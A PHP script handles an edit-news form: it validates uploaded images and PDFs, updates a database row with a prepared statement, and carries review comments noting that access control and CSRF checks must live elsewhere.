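<?php
/**
 * Handles the "edit news item" form post.
 *
 * Flow: read the posted fields, optionally store a replacement image and/or
 * PDF under ../assets/uploads/, update the matching `news_detail` row, then
 * send the browser back to main.php after one second.
 *
 * Every value in $_POST and $_FILES is attacker-controllable, so:
 *   - the UPDATE uses a prepared statement instead of string interpolation;
 *   - an upload is accepted only when both its extension and its content
 *     match the allow-list;
 *   - the Refresh header is sent before any output, so it is not lost to
 *     "headers already sent".
 */
@session_start();

// NOTE(review): nothing visible in this script checks that the session belongs
// to a logged-in editor before files are written and a row is updated. Confirm
// that access control (and a CSRF token check) is enforced elsewhere, for
// example in a shared include or at the web-server level.

// Read a posted field as a string; missing or non-string values become ''.
$field = static function (string $key): string {
    $value = $_POST[$key] ?? '';

    return is_string($value) ? $value : '';
};

$news_detail_id = $field('news_detail_id');
$date = $field('date');
$month = $field('month');
$year = $field('year');
$news_type = $field('news_type');
$topics = $field('topics');
$details = $field('details');
$image = $field('image_name');
$file_pdf = $field('file_pdf_name');
$link1 = $field('link1');

$uploadOk = 1;
$upload_err_msg = '';
$notices = [];

/**
 * Decide whether one uploaded file may be stored at $targetFile.
 *
 * Returns null when the file is acceptable, otherwise the message to show.
 * The client-supplied name and MIME type are never trusted on their own: the
 * extension must be on the allow-list AND the bytes on disk must look like
 * the claimed type.
 */
$rejectReason = static function (array $file, string $targetFile, string $kind): ?string {
    $tmpName = (string) ($file['tmp_name'] ?? '');
    if ($tmpName === '' || !is_uploaded_file($tmpName)) {
        return 'Sorry, there was an error uploading your file.';
    }
    if (file_exists($targetFile)) {
        return 'Sorry, file already exists.';
    }

    $extension = strtolower(pathinfo($targetFile, PATHINFO_EXTENSION));

    if ($kind === 'pdf') {
        // A PDF is expected to start with the "%PDF-" signature.
        $signature = file_get_contents($tmpName, false, null, 0, 5);
        if ($extension !== 'pdf' || $signature !== '%PDF-') {
            return 'Sorry, only PDF files are allowed.';
        }

        return null;
    }

    // Image: getimagesize() parses the real header; index 2 is the detected type.
    $info = in_array($extension, ['jpg', 'jpeg', 'png', 'gif'], true)
        ? getimagesize($tmpName)
        : false;
    if ($info === false || !in_array($info[2], [IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG], true)) {
        return 'Sorry, only JPG, JPEG, PNG & GIF files are allowed.';
    }

    return null;
};

// Collect the uploads that actually arrived (image first, then PDF, matching
// the original processing order). A missing form field counts as "no file".
$pending = [];
foreach (['imgInp' => ['image', '../assets/uploads/image/'], 'file_pdf' => ['pdf', '../assets/uploads/pdf/']] as $input => [$kind, $targetDir]) {
    $file = $_FILES[$input] ?? null;
    if (!is_array($file) || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        continue;
    }
    // basename() strips any directory part a client put into the file name.
    // NOTE(review): the stored name is still client-chosen; the upload
    // directories should be configured so the web server never executes
    // anything placed in them.
    $name = basename((string) ($file['name'] ?? ''));
    $pending[] = [
        'kind' => $kind,
        'file' => $file,
        'name' => $name,
        'target' => $targetDir . $name,
    ];
}

// Validate everything first: when one file is rejected, nothing is stored.
foreach ($pending as $upload) {
    $reason = $rejectReason($upload['file'], $upload['target'], $upload['kind']);
    if ($reason !== null) {
        $upload_err_msg = $reason;
        $uploadOk = 0;
        break;
    }
}

if ($uploadOk === 1) {
    foreach ($pending as $upload) {
        if (move_uploaded_file($upload['file']['tmp_name'], $upload['target'])) {
            $notices[] = 'The file ' . htmlspecialchars($upload['name'], ENT_QUOTES, 'UTF-8') . ' has been uploaded.';
        } else {
            // A failed move must not be reported as a successful edit.
            $upload_err_msg = 'Sorry, there was an error uploading your file.';
            $uploadOk = 0;
            break;
        }
    }
}

if ($uploadOk === 1) {
    @include("assets/function/connectdb.php");

    $updated = false;
    if (isset($conn) && $conn instanceof mysqli) {
        // Placeholders keep posted text out of the SQL grammar entirely.
        $stmt = mysqli_prepare(
            $conn,
            'UPDATE `news_detail` SET
             `date` = ?,
             `month` = ?,
             `year` = ?,
             `news_type` = ?,
             `topics` = ?,
             `image` = ?,
             `details` = ?,
             `files_pdf` = ?,
             `link1` = ?
             WHERE `news_detail`.`news_detail_id` = ?'
        );
        if ($stmt !== false) {
            // All ten values are bound as strings, as the original quoted them all.
            mysqli_stmt_bind_param(
                $stmt,
                'ssssssssss',
                $date,
                $month,
                $year,
                $news_type,
                $topics,
                $image,
                $details,
                $file_pdf,
                $link1,
                $news_detail_id
            );
            $updated = mysqli_stmt_execute($stmt);
            mysqli_stmt_close($stmt);
        }
    }

    if (!$updated) {
        $upload_err_msg = 'Sorry, the news item could not be updated.';
        $uploadOk = 0;
    }
}

// Send the header before any body output.
header("Refresh:1; url=main.php");

echo implode('', $notices);

$alertText = $uploadOk === 1
    ? 'แก้ไขข้อมูลข่าวประชาสัมพันธ์เรียบร้อยแล้วครับ!!'
    : $upload_err_msg;

// json_encode() with the HEX flags yields a string literal that is safe inside
// an inline <script> element.
$alertLiteral = json_encode(
    $alertText,
    JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE
);
echo '<script>alert(' . $alertLiteral . ')</script>';
?>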

